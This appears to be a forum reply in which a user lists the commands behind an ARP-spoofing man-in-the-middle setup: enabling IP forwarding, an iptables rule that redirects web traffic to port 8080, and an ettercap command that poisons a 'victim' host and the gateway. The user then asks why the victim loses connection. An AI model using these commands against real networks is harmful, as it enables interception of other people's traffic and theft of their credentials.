Yes I have enabled IP Tables. Here are all the commands i used from start to finish:
1. Turn on IP Forwarding:
Code:
echo "1" > /proc/sys/net/ipv4/ip_forward
2. Modify IP Tables:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3. Start ettercap arpspoof
Code:
ettercap -T -M ARP -i eth0 /192.168.1.50/ /192.168.1.1/
And thats basically it, but it always seems to make the victim lose their connection. I don't know if i'm missing a step, mistyping a step, or if it's because i'm in a VM. Thanks again for all your help!